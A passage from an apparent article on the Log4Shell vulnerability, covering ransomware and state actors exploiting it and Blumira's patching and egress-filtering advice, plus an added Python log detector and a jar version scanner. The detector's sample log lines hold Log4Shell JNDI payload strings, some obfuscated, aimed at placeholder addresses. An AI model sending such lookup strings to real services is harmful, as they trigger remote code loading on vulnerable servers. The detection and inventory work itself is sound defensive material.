Indeed, they already are. As Anurag Gurtu, StrikeReady’s chief product officer, observed, “Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability. It’s the Khonsari ransomware gang that has built an attack using C# and the .NET framework. After execution, the malware enumerates all mounted drives (other than C:/) and targets user directories including Documents, Videos, Pictures, Downloads, and Desktop. An AES 128 CBC algorithm is used for encryption, and the files are saved with a .khonsari extension.”

They’re not the only ones. State-sponsored hackers from China, Iran, North Korea, and Turkey; Cobalt Strike; and many others are also exploiting Log4j vulnerabilities. This latest vulnerability simply opens the doors even wider for would-be attackers.

It will only get worse before it gets better. As Sophos senior threat researcher Sean Gallagher recently explained, to date Log4Shell attackers have been focused on cryptomining, but this is just a “lull before the storm.” He continued, “We expect adversaries are likely grabbing as much access to whatever they can get right now… to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems.” After all, Gallagher concluded, “This vulnerability can be everywhere.”

What can you do about this? Blumira suggests the following:

Update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further. This includes moving any custom applications to 2.16 in their dependency manifests as soon as possible to avoid incidental exploitation.

You should also look closely at your network firewall and egress filtering. The mission here is to restrict the callback required for the actual exploit to land. Significantly limiting the egress traffic of your endpoints will reduce the risk as you patch your applications. In particular, make sure that only certain machines can send out traffic over ports 53, 389, 636, and 1099. All other ports should be blocked.

Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports.
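Blumira’s warning that “specific patterns should not be expected” applies to the WebSocket traffic; the lookup string itself still has to arrive at a listening service, and services that log their request paths and headers give you a place to look. The following is an added example, not Blumira’s code or anything from this article: a small Python detector that percent-decodes each log line, unwraps the nested ${lower:…} and ${…:-…} lookup forms used to split up the keyword, and reports the scheme (ldap, rmi, dns, …) of any ${jndi:…} lookup it finds. The log lines are constructed for the example, and the addresses come from documentation and private ranges rather than real hosts.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Innermost "${...}" expression, i.e. one with no nested "${" inside its braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Once normalised, a JNDI lookup always reads "${jndi:<scheme>:...}".
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Collapse one innermost lookup wrapper; jndi lookups are kept intact."""
    body = m.group(1)
    key, sep, value = body.partition(":")
    if key.lower() == "jndi":
        return m.group(0)                      # this is the thing we want to see
    if ":-" in body:                           # ${x:-default} evaluates to "default"
        return body.split(":-", 1)[1]
    if sep and key.lower() in ("lower", "upper"):
        return value                           # ${lower:J} -> J (case folded later)
    return m.group(0)                          # any other lookup: leave as-is


def normalize(text: str, max_rounds: int = 16) -> str:
    """Repeatedly unwrap nested lookups so a split or re-cased 'jndi' reads plainly."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text.lower()


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line that carries a (possibly obfuscated) JNDI lookup."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(lines, start=1):
        norm = normalize(unquote(raw))         # percent-decode first, then unwrap
        m = _JNDI.search(norm)
        if m:
            findings.append({"line": lineno, "scheme": m.group(1), "raw": raw})
    return findings


# Constructed access-log lines (not real traffic). 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.5 - - "GET /api/items?q=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 500 "-"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:rmi://10.0.0.7:1099/x}"',
    '10.0.0.8 - - "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1" 200 "-"',
    '10.0.0.9 - - "GET /health?env=${env:HOME} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi lookup via {hit['scheme']}")
```

The ordinary `${env:HOME}` lookup on the last line is deliberately left alone, so the detector reports only the three lines that resolve to a JNDI lookup. Feed it the access logs of whatever local listening services the WebSocket vector can reach, not just the edge proxies.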
Good luck, get back to work hunting down Log4j libraries and calls, and hope that you can get as much of your infrastructure as possible battened down before the holidays.
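Hunting down the libraries themselves can be automated. As an added example, not Blumira’s or ZDNet’s code, here is a Python scanner that walks a directory tree, opens each jar, reads the version from log4j-core’s pom.properties (falling back to the version in the filename), notes whether the JndiLookup class is present, and flags anything below 2.16.0. It assumes the article’s “2.16” means 2.16.0, builds a constructed sample tree in a temporary directory so it runs offline, and does not open jars nested inside other jars.

```python
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

# Remediation target named in the article; assumed to mean 2.16.0.
FIXED_VERSION = (2, 16, 0)
# Entries found inside a Maven-built log4j-core jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
_NAME_RE = re.compile(r"log4j-core-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); missing components are padded with zeros."""
    nums = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def inspect_jar(path: str) -> Optional[Dict[str, object]]:
    """Describe a log4j-core jar, or return None if the jar shows no sign of log4j-core."""
    version: Optional[str] = None
    has_jndi_lookup = False
    try:
        with zipfile.ZipFile(path) as jar:
            names = set(jar.namelist())
            has_jndi_lookup = JNDI_LOOKUP_CLASS in names
            if POM_PROPERTIES in names:
                for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
    except zipfile.BadZipFile:
        return None
    if version is None:                       # shaded/renamed jar: try the filename
        m = _NAME_RE.search(os.path.basename(path))
        if m:
            version = m.group(1)
    if version is None and not has_jndi_lookup:
        return None
    # Unknown version inside a jar that carries JndiLookup is treated as needing work.
    needs_update = version is None or parse_version(version) < FIXED_VERSION
    return {
        "path": path,
        "version": version,
        "jndi_lookup_present": has_jndi_lookup,
        "needs_update": needs_update,
    }


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk a directory and inspect every .jar (jars nested inside jars are not opened)."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.lower().endswith(".jar"):
                info = inspect_jar(os.path.join(dirpath, name))
                if info is not None:
                    findings.append(info)
    return findings


def _write_jar(path: str, version: Optional[str], with_jndi_lookup: bool) -> None:
    """Constructed sample jar; a few entries are enough to exercise the scanner."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            jar.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes


def demo() -> List[Dict[str, object]]:
    """Build a constructed sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "lib")
        os.makedirs(lib)
        _write_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1", True)
        _write_jar(os.path.join(lib, "log4j-core-2.16.0.jar"), "2.16.0", True)
        _write_jar(os.path.join(lib, "shaded-service.jar"), None, True)   # fat jar, no pom
        _write_jar(os.path.join(lib, "commons-io-2.11.0.jar"), None, False)  # unrelated
        results = scan_tree(root)
        for r in results:
            r["path"] = os.path.relpath(str(r["path"]), root).replace(os.sep, "/")
        return results


if __name__ == "__main__":
    for r in demo():
        print(r)
```

Point `scan_tree` at an application’s deployment directory rather than at `demo()`; the shaded jar in the sample shows why the JndiLookup check matters, since a fat jar that bundles log4j-core carries no pom.properties and no version in its name.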